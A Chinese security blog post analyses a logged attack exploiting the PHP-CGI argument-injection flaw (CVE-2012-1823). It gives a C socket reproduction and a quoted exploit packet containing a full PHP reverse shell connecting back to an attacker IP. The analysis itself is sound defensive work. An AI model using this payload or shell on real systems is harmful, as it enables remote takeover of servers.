无域名HTTP请求攻击分析

检测组内WEB服务器攻击日志时，在防护WAF上发现如下攻击记录：

http://-c//cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E

攻击来源为192.187.125.130

请求方法为POST

解码后为：

http://-c//cgi-bin/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-d+auto_prepend_file=php://input+-n

使用的WAF不能记录POST提交的内容，无法获悉攻击者提交的数据。

攻击手段分析

最开始很不理解这个HTTP请求是如何发送过来的，没有使用正确的域名，也没有在HTTP请求中指定服务器IP！经过讨论有同事认为是工具指定IP和端口利用socket自动发送的。

攻击复现

做如下尝试：

#include <sys/types.h>

#include <sys/socket.h>

#include <sys/types.h>

#include <stdio.h>

#include <netinet/in.h>

#include <arpa/inet.h>

#include <string.h>

int main(){

int sockfd;

int len;

struct sockaddr_in address;

int result;

char *strings="GET/test.jsp?test=%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6EHTTP/1.1\r\nHost: -test\r\nConnection: Close\r\n\r\n";

char ch;

sockfd = socket(AF_INET,SOCK_STREAM, 0);

address.sin_family = AF_INET;

address.sin_addr.s_addr =inet_addr("159.226.16.74");

address.sin_port = htons(80);

len = sizeof(address);

result = connect(sockfd,  (struct sockaddr *)&address, len);

if(result == -1){

    perror("oops: client1");

    return 1;

}

 

write(sockfd,strings,strlen(strings));

while(read(sockfd,&ch,1)){

    printf("%c", ch);

}

close(sockfd);

return 1;

}

 

编译执行，得到如下返回结果：

HTTP/1.1 403 Forbidden

Date: Mon, 16 Jun 2014 02:11:20GMT

Content-Type: text/html

Content-Length: 343

X-Squid-Error: policy/scan.html 0

Connection: close

 

<!DOCTYPE HTML PUBLIC"-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>

<title>访问禁止</title>

<meta http-equiv="Content-type"content="text/html; charset=utf-8">

 

</head>

<body>

 请不要进行扫描攻击！

</body>

</html>

 

<BR clear="all">

<ADDRESS>

</ADDRESS>

</BODY></HTML>

查看防护WAF攻击日志：

与攻击者的攻击效果一样，说明猜测是正确的，攻击者确实是使用socket指定IP和端口发送的HTTP请求。

对那些限定只能使用域名访问的网站，这种攻击方式应该是无效的。尽管如此，但是这种攻击方式对那些普通的允许直接使用IP访问的网站是非常犀利的。设想如果实例程序中，目的IP是一个IP地址段，那么该地址段内的所有存在漏洞的WEB服务器都会收到攻击影响，而攻击者根本不需要知道网站域名。

漏洞分析

百度或google检索：

-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-d+auto_prepend_file=php://input+-n

获悉如下信息[2]

Apache / PHP 5.x Remote Code Execution简单分析

这篇下午写完了发到邮件组里了，然后同学找有事出去。回来在微博上看到素包子写了篇文章，思路清晰起承转合甚好。下面是我自己写的挫文。

测试环境

ubuntu 10.04 + apache2 + php 5.3.2。最开始测试直接用apt-getinstall安装的apache2，但是后面怎么设置也不行，后来改用了源码编译后面经过配置exploit-db上的exp可以使用了。

该exp使用的要求（exp说明）

1、具有cve-2012-1823【http://zone.wooyun.org/content/151】， 后面说原因

2、php以cgi形式安装的

3、可以访问到路径/cgi-bin/php5-cgi等cgi程序

exp分析

exp大致过程如下：

默认情况下php.ini中有两个和cgi运行方式有关的开关，exp使用cve-2012-1823将和cgi安全有关的开关关掉，而后将远程包含的标签打开，将post的数据包含进来并且执行，而这个post的数据就是反弹shell的payload，而且该exp尝试了多个cgi程序：/cgi-bin/php, /cgi-bin/php5,/cgi-bin/php-cgi,/cgi-bin/php.cgi

 

exp的数据包如下：

POST/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6EHTTP/1.1

Host: 10.21.24.111

User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0Mobile/10A5355d Safari/8536.25

Content-Type: application/x-www-form-urlencoded

Content-Length: 2048

Connection: close

 

 

<?php

set_time_limit(0);

$ip = '10.21.24.109';

$port = 7758;

$chunk_size = 1400;

$write_a = null;

$error_a = null;

$shell = 'unset HISTFILE; unset HISTSIZE;uname -a; w; id; /bin/sh -i';

$daemon = 0;

$debug = 0;

if (function_exists('pcntl_fork')) {

.$pid = pcntl_fork();.

.if ($pid == -1) {

..printit("ERROR: Can't fork");

..exit(1);

.}

.if ($pid) {

..exit(0);

.}

.if (posix_setsid() == -1) {

..printit("Error: Can'tsetsid()");

..exit(1);

.}

.$daemon = 1;

} else {

.printit("WARNING: Failed todaemonise.");

}

chdir("/");

umask(0);

$sock = fsockopen($ip, $port, $errno,$errstr, 30);

if (!$sock) {

.printit("$errstr ($errno)");

.exit(1);

}

$descriptorspec = array(

   0=> array("pipe", "r"),

   1=> array("pipe", "w"),

   2=> array("pipe", "w")

);

$process = proc_open($shell,$descriptorspec, $pipes);

if (!is_resource($process)) {

.printit("ERROR: Can't spawnshell");

.exit(1);

}

stream_set_blocking($pipes[0], 0);

stream_set_blocking($pipes[1], 0);

stream_set_blocking($pipes[2], 0);

stream_set_blocking($sock, 0);

while (1) {

.if (feof($sock)) {

..printit("ERROR: Shell connectionterminated");

..break;

.}

.if (feof($pipes[1])) {

..printit("ERROR: Shell processterminated");

..break;

.}

.$read_a = array($sock, $pipes[1],$pipes[2]);

.$num_changed_sockets =stream_select($read_a, $write_a, $error_a, null);

.if (in_array($sock, $read_a)) {

..if ($debug) printit("SOCKREAD");

..$input = fread($sock, $chunk_size);

..if ($debug) printit("SOCK:$input");

..fwrite($pipes[0], $input);

.}

.if (in_array($pipes[1], $read_a)) {

..if ($debug) printit("STDOUTREAD");

..$input = fread($pipes[1], $chunk_size);

..if ($debug) printit("STDOUT:$input");

..fwrite($sock, $input);

.}

.if (in_array($pipes[2], $read_a)) {

..if ($debug) printit("STDERRREAD");

..$input = fread($pipes[2], $chunk_size);

..if ($debug) printit("STDERR:$input");

..fwrite($sock, $input);

.}

}

 

fclose($sock);

fclose($pipes[0]);

fclose($pipes[1]);

fclose($pipes[2]);

proc_close($process);

function printit ($string) {

.if (!$daemon) {

..print "$string

";

.}

}

exit(1);

?>

很明显，这是针对一个特定漏洞而构建的exp，其关键有两个：

一个就是我们的防护WAF抓到的攻击URL，也就是上面POST的那个URL；

另一个是POST的数据，这里没有贴出来，详细内容可参考[2]，其POST的数据就是一个PHP的是反弹shell的payload。

总结

利用socket实现HTTP请求，可以在不关心域名的情况下，基于特定漏洞，实现对批量IP地址的漏洞扫描、探测或攻击。

 

参考

1、http://blog.163.com/zongyuan1987@126/blog/static/13162315620108104825970/

2、http://www.2cto.com/Article/201311/256690.html

3、http://blog.youkuaiyun.com/mqwind/article/details/4814842